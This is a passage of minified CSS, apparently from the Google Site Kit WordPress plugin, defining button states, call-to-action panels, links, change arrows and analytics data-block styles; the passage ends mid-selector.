.mdc-button--tertiary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(22,27,24,.08)}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:hover::before,.googlesitekit-plugin .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:hover:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:hover:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--tertiary:active,.googlesitekit-plugin .mdc-button--tertiary:focus{outline:none}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){background-color:rgba(22,27,24,.26)}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--tertiary:active::before,.googlesitekit-plugin .mdc-button--tertiary:active::after,.googlesitekit-plugin .mdc-button--tertiary:focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--tertiary:active:hover::before,.googlesitekit-plugin .mdc-button--tertiary:focus:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .mdc-button--tertiary:focus:not(:disabled){color:#161b18}.googlesitekit-plugin .mdc-button--callout{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:32px;padding:6px 16px}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){background-color:rgba(147,201,168,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:hover:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){background-color:#93c9a8}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:focus:not(:disabled){color:#265c3b}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-primary:disabled{color:rgba(38,92,59,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){background-color:rgba(225,177,85,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:hover:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){background-color:#e1b155}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:focus:not(:disabled){color:#4e3300}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-warning:disabled{color:rgba(78,51,0,.4)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){background-color:rgba(255,194,174,.6)}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:hover:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus{outline:none}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){background-color:#ffc2ae}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:hover::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:active:not(:disabled),.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:focus:not(:disabled){color:#7a1e00}.googlesitekit-plugin .mdc-button--callout.mdc-button--callout-error:disabled{color:rgba(122,30,0,.4)}.googlesitekit-plugin .MuiCircularProgress-colorPrimary{color:#3c7251}.googlesitekit-plugin .MuiCircularProgress-colorSecondary{color:#108080}.googlesitekit-plugin .googlesitekit-analytics-cta{--cta-analytics-gap: 16px;--cta-analytics-gap-narrow: calc(var(--cta-analytics-gap) / 2);background-color:#ebeef0;display:flex;flex-direction:column;gap:var(--cta-analytics-gap);padding:var(--cta-analytics-gap)}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta{--cta-analytics-gap: 24px;flex-direction:row-reverse}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta--description{color:#161b18;font-size:14px;letter-spacing:.25px;margin:0}.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{margin-top:var(--cta-analytics-gap-narrow);width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{width:auto}}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .mdc-button{margin-top:var(--cta-analytics-gap)}}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-cta--activate-analytics,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs{display:flex;gap:var(--cta-analytics-gap)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph{background-color:#fff;border-radius:4px;display:flex;flex:1;flex-direction:column;padding:var(--cta-analytics-gap-narrow)}#dashboard-widgets .googlesitekit-plugin .googlesitekit-analytics-cta h3.googlesitekit-analytics-cta__preview-graph--title,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--title{color:#333935;font-size:12px;font-weight:500;letter-spacing:.2px;margin:0 0 auto;padding-bottom:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--icons{align-items:center;color:#cbd0d3;display:flex;gap:4px;padding-top:var(--cta-analytics-gap-narrow)}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--up-arrow{height:12px}.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graph--bar{background-color:#cbd0d3;border-radius:5px;height:8px;width:24px}@media(min-width: 1440px){.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__preview-graphs,.googlesitekit-plugin .googlesitekit-analytics-cta .googlesitekit-analytics-cta__details{flex:1}}.googlesitekit-plugin .googlesitekit-change-arrow{--color-up: #46732b;--color-down: #ac4220}.googlesitekit-plugin .googlesitekit-change-arrow--inverted-color{--color-up: #ac4220;--color-down: #46732b}.googlesitekit-plugin .googlesitekit-change-arrow--up{color:var(--color-up)}.googlesitekit-plugin .googlesitekit-change-arrow--down{color:var(--color-up);transform:rotate(180deg)}.googlesitekit-plugin .googlesitekit-change-arrow--down path{fill:var(--color-down)}.googlesitekit-plugin .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;border-radius:16px;font-size:14px;grid-column:span 3;grid-row:span 3;height:100%;letter-spacing:.25px;line-height:1.43;padding:16px;width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-cta,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:24px}}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta--error,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta--error{background-color:#fff}.googlesitekit-adminbar-modules .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-adminbar-modules #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{padding:16px}.googlesitekit-wp-dashboard .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{background-color:#ebeef0;box-sizing:border-box;height:auto;margin-top:12px;padding:12px}.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta .googlesitekit-plugin .googlesitekit-cta,.googlesitekit-wp-dashboard .googlesitekit-wp-dashboard-stats__cta #dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta{margin-top:0}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__title{color:#161b18;font-weight:500;margin:0 0 5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-adminbar-modules .googlesitekit-cta__title{font-weight:700;letter-spacing:.5px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description{color:#161b18;margin:0 0 20px}.googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta .googlesitekit-cta__description p:first-child{margin-top:0}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error{background-color:#ffded3}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error a,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__title{color:#7a1e00}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .googlesitekit-cta__description{color:#7a1e00;word-break:break-word}.googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled),#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta.googlesitekit-cta--error .mdc-button:not(:disabled){background-color:#ac4220;color:#fff}.googlesitekit-plugin .googlesitekit-cta *:last-child,#dashboard-widgets .inside .googlesitekit-plugin .googlesitekit-cta *:last-child{margin-bottom:0}.googlesitekit-wp-dashboard .googlesitekit-cta--error{margin-top:12px}.googlesitekit-cta-link{align-items:center;cursor:pointer;display:inline-flex;font-family:inherit;font-size:inherit;font-weight:inherit;padding:0;text-align:left;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link svg{fill:currentColor}.googlesitekit-cta-link:hover svg{fill:currentColor}.googlesitekit-page .googlesitekit-cta-link{color:#108080}.googlesitekit-page .googlesitekit-cta-link:hover{color:#108080;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-cta-link.googlesitekit-cta-link--secondary{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover{color:#108080}.googlesitekit-cta-link.googlesitekit-cta-link--secondary:hover svg{fill:currentColor}.googlesitekit-cta-link.googlesitekit-cta-link--caps{text-transform:uppercase}.googlesitekit-cta-link.googlesitekit-cta-link--danger{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--small{font-size:12px;letter-spacing:.2px}.googlesitekit-cta-link.googlesitekit-cta-link--standalone{display:flex}.googlesitekit-cta-link.googlesitekit-cta-link--inverse{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--inverse:hover{color:#fff}.googlesitekit-cta-link.googlesitekit-cta-link--disabled{color:#b8bdb9;cursor:default}.googlesitekit-cta-link.googlesitekit-cta-link--danger:hover{color:#ac4220}.googlesitekit-cta-link.googlesitekit-cta-link--disabled:hover{color:#b8bdb9;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-cta-link.googlesitekit-cta-link--no-flex{display:inline}button.googlesitekit-cta-link{color:#3c7251}button.googlesitekit-cta-link svg{fill:currentColor}button.googlesitekit-cta-link:hover{color:#2e5f41}button.googlesitekit-cta-link:hover svg{fill:currentColor}button.googlesitekit-cta-link--link-button{padding:2px 10px}button.googlesitekit-cta-link--link-button:focus{background-color:rgba(60,114,81,.08);outline:none}button.googlesitekit-cta-link--link-button.googlesitekit-cta-link--secondary:focus{background-color:rgba(16,128,128,.08)}.googlesitekit-data-block{--color-up: #46732b;--color-down: #ac4220;position:relative;text-align:left}.post-php .googlesitekit-data-block{min-width:150px}.googlesitekit-wp-dashboard .googlesitekit-data-block{padding-top:12px}.googlesitekit-data-block .googlesitekit-data-block__title{align-items:flex-start;color:#6c726e;display:flex;flex:1;flex-direction:column;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:700;justify-content:flex-start;margin:0 0 12px;row-gap:8px}.googlesitekit-data-block .googlesitekit-data-block__title .googlesitekit-new-badge{margin-left:0}.googlesitekit-data-block.googlesitekit-data-block--button .googlesitekit-data-block__title{align-items:center}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__title{font-size:16px;font-weight:700;letter-spacing:.5px;margin-bottom:5px}#dashboard-widgets .googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__title{font-size:12px;letter-spacing:.2px}.googlesitekit-data-block .googlesitekit-data-block__title-inner{align-items:center;display:flex;flex:1}.googlesitekit-data-block .googlesitekit-data-block__title-datapoint-wrapper{display:flex;flex:1;flex-flow:column}.googlesitekit-data-block .googlesitekit-data-block__datapoint{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:46px;font-weight:500;line-height:1.13;margin:0;text-wrap:nowrap}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__datapoint{display:inline-block;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:38px;line-height:1.158;margin-right:5px}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__datapoint{font-size:32px}.googlesitekit-data-block .googlesitekit-data-block__change{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1;margin-top:16px;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__change{display:inline-block;font-size:16px;letter-spacing:.5px;margin-top:0}.googlesitekit-wp-dashboard .googlesitekit-data-block .googlesitekit-data-block__change{margin-top:10px}.googlesitekit-data-block .googlesitekit-data-block__change--no-change{visibility:hidden}.googlesitekit-data-block .googlesitekit-data-block__sparkline{margin-top:8px;max-width:150px}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__sparkline{display:none}.googlesitekit-data-block .googlesitekit-data-block__arrow{display:inline-block;line-height:1;margin-right:2px;vertical-align:baseline}.googlesitekit-data-block .googlesitekit-data-block__arrow--reverse{transform:rotate(180deg)}#wpadminbar .googlesitekit-data-block .googlesitekit-data-block__arrow .svg{height:9px;width:9px}.googlesitekit-data-block .googlesitekit-data-block__suffix{margin-left:4px}.googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-data-block .googlesitekit-data-block__suffix{color:#6c726e;display:inline-block;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;text-transform:none}.googlesitekit-adminbar .googlesitekit-data-block .googlesitekit-data-block__value,.googlesitekit-adminbar .googlesitekit-data-block 